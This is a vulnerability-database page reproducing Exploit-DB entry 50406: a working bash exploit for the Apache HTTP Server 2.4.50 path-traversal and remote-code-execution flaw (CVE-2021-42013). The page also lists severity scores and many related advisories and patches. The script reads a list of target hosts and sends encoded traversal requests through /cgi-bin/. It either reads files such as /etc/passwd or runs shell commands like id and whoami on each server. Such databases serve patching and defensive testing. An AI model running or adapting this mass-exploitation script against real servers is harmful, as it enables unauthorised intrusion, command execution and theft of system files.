Lucene search
Lucas SouzaEDB-ID:50406HistoryOct 13, 2021 - 12:00 a.m.
Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
2021-10-1300:00:00
Lucas Souza
www.exploit-db.com
1764
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%
# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.50
# Tested on: 2.4.50
# CVE : CVE-2021-42013
# Credits: Ash Daulton and the cPanel Security Team
#!/bin/bash
if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
echo ./PoC.sh targets.txt /bin/sh id
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done
# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoamiRelated
veracode
veracode
Path Traversal
2021-10-08 21:08:53
githubexploit
githubexploit
Exploit for Path Traversal in Apache Http Server
2021-10-20 15:32:39
Exploit for Path Traversal in Apache Http Server
2021-10-08 05:44:54
Exploit for Path Traversal in Apache Http Server
2022-03-08 21:48:40
dsquare
dsquare
Apache 2.4.50 RCE
2021-10-08 00:00:00
Apache 2.4.50 Path Traversal
2021-10-08 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 10 package apache2 version 1:2.4.51-alt1
2021-10-11 00:00:00
Security fix for the ALT Linux 9 package apache2 version 1:2.4.51-alt1
2021-10-13 00:00:00
zdt
zdt
Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (2)
2021-10-25 00:00:00
Apache 2.4.50 Remote Code Execution Exploit
2022-06-07 00:00:00
kaspersky
kaspersky
KLA12372 RCE vulnerability in Apache HTTP Server
2021-10-07 00:00:00
packetstorm
packetstorm
Apache HTTP Server 2.4.50 Remote Code Execution
2021-10-24 00:00:00
Apache HTTP Server 2.4.50 Path Traversal / Code Execution
2021-10-13 00:00:00
Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution
2021-10-25 00:00:00
openvas
openvas
Apache HTTP Server 2.4.49 - 2.4.50 Directory Traversal / RCE Vulnerability - Active Check
2021-10-08 00:00:00
Slackware: Security Advisory (SSA:2021-280-01)
2022-04-21 00:00:00
nessus
nessus
Apache HTTP Server 2.4.49 & 2.4.50 Path Traversal (CVE-2021-42013)
2021-11-18 00:00:00
FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)
2021-10-11 00:00:00
Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability
2021-10-08 00:00:00
hackerone
hackerone
exploitdb
exploitdb
Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
2021-10-25 00:00:00
Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
2021-11-11 00:00:00
prion
prion
Path traversal
2021-10-05 09:15:00
Path traversal
2021-10-07 16:15:00
thn
thn
rapid7blog
rapid7blog
Apache HTTP Server CVE-2021-41773 Exploited in the Wild
2021-10-06 16:42:32
Metasploit Wrap-Up
2021-10-29 17:59:46
alpinelinux
alpinelinux
CVE-2021-41773
2021-10-05 09:15:00
CVE-2021-42013
2021-10-07 16:15:00
freebsd
freebsd
Apache httpd -- Path Traversal and Remote Code Execution
2021-10-07 00:00:00
fedora
fedora
[SECURITY] Fedora 34 Update: httpd-2.4.51-1.fc34
2021-10-12 23:46:03
[SECURITY] Fedora 35 Update: httpd-2.4.51-2.fc35
2021-10-15 00:50:08
cisa
cisa
Apache Releases Security Update for Apache HTTP Server
2021-10-06 00:00:00
metasploit
metasploit
Apache 2.4.49/2.4.50 Traversal RCE scanner
2021-10-06 17:00:59
Apache 2.4.49/2.4.50 Traversal RCE
2021-10-08 11:22:47
osv
osv
BIT-apache-2021-42013
2024-03-06 10:54:27
BIT-apache-2021-41773
2024-03-06 10:54:39
CVE-2021-41773
2021-10-05 09:15:00
cve
cve
CVE-2021-42013
2021-10-07 16:15:00
CVE-2021-41773
2021-10-05 09:15:00
debiancve
debiancve
CVE-2021-41773
2021-10-05 09:15:00
CVE-2021-42013
2021-10-07 16:15:00
checkpoint_advisories
checkpoint_advisories
Apache HTTP Server Directory Traversal (CVE-2021-41773; CVE-2021-42013)
2021-10-06 00:00:00
attackerkb
attackerkb
CVE-2021-41773
2021-10-05 00:00:00
Apache HTTPd 2.4.49/2.4.50 θ·―εΎη©ΏθΆζΌζ΄
2021-10-11 00:00:00
redhatcve
redhatcve
CVE-2021-42013
2021-10-07 17:33:09
mageia
mageia
Updated apache packages fix security vulnerability
2021-10-08 22:12:12
f5
f5
K04082144 : Apache HTTP Server vulnerability CVE-2021-41773, CVE-2021-42013
2021-10-21 00:00:00
jvn
jvn
JVN#51106450: Apache HTTP Server vulnerable to directory traversal
2021-10-08 00:00:00
nuclei
nuclei
Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
2021-10-07 18:17:29
Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
2021-10-07 18:17:29
qualysblog
qualysblog
Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013)
2021-10-28 06:22:22
Qualys Response to CISA Alert: Binding Operational Directive 22-01
2021-11-09 06:15:01
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
impervablog
impervablog
archlinux
archlinux
[ASA-202110-1] apache: directory traversal
2021-10-21 00:00:00
ubuntucve
ubuntucve
CVE-2021-41773
2021-10-05 00:00:00
CVE-2021-42013
2021-10-07 00:00:00
slackware
slackware
[slackware-security] httpd
2021-10-08 03:27:06
cisa_kev
cisa_kev
Apache HTTP Server Path Traversal Vulnerability
2021-11-03 00:00:00
Apache HTTP Server Path Traversal Vulnerability
2021-11-03 00:00:00
ibm
ibm
httpd
httpd
photon
photon
Critical Photon OS Security Update - PHSA-2021-0118
2021-10-19 00:00:00
Critical Photon OS Security Update - PHSA-2021-4.0-0118
2021-10-20 00:00:00
malwarebytes
malwarebytes
[Updated, again] Apache fixes zero-day vulnerability in HTTP Server
2021-10-06 14:23:08
cisco
cisco
Apache HTTP Server Vulnerabilities: October 2021
2021-10-07 16:00:00
trellix
trellix
The Bug Report β October Edition
2021-11-02 00:00:00
The Bug Report β October Edition
2021-11-02 00:00:00
amazon
amazon
Important: httpd
2021-10-15 07:57:00
Important: httpd24
2021-10-15 07:52:00
gentoo
gentoo
Apache HTTPD: Multiple Vulnerabilities
2022-08-14 00:00:00
ics
ics
Top CVEs Actively Exploited By Peopleβs Republic of China State-Sponsored Cyber Actors
2022-10-06 12:00:00
2022 Top Routinely Exploited Vulnerabilities
2023-08-03 12:00:00
mmpc
mmpc
Microsoft research uncovers new Zerobot capabilities
2022-12-21 20:00:00
mssecure
mssecure
Microsoft research uncovers new Zerobot capabilities
2022-12-21 20:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - January 2022
2022-01-18 00:00:00
Oracle Critical Patch Update Advisory - April 2022
2022-04-19 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%
Related for EDB-ID:50406